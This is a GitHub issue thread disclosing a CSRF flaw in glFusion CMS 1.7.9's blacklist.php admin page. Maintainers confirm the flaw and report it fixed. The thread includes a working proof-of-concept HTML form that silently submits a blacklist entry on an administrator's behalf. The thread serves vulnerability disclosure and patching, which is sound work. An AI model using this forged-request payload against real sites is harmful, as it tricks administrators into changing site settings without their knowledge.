glFusion CMS 1.7.9 blacklist.php CSRF vulnerability

[Topsec-bunney]

Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist

poc

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.255.130/glfusion-1.7.9/public_html/admin/plugins/bad_behavior2/blacklist.php" method="POST">
      <input type="hidden" name="mode" value="addsave" />
      <input type="hidden" name="bl&#95;type" value="spambot&#95;ip" />
      <input type="hidden" name="bl&#95;item" value="1&#46;1&#46;1&#46;121" />
      <input type="hidden" name="ban&#95;reason" value="ipbrute" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

[leegarner]

I can duplicate this, we should just need to add the CSRF token to the blacklist (and other) process. Thanks.

…

On Wed, Dec 8, 2021 at 11:11 PM Topsec_bunney ***@***.***> wrote: *Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist* poc ` <script>history.pushState('', '', '/')</script> `   — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#486>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ABYLFOMJLAEHDLVR75AIQ3DUQBJBRANCNFSM5JVVT5KQ> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>.

[mark0263]

Adding CSRF support for blacklist entry / edit.

[mark0263]

Fixed with b380ead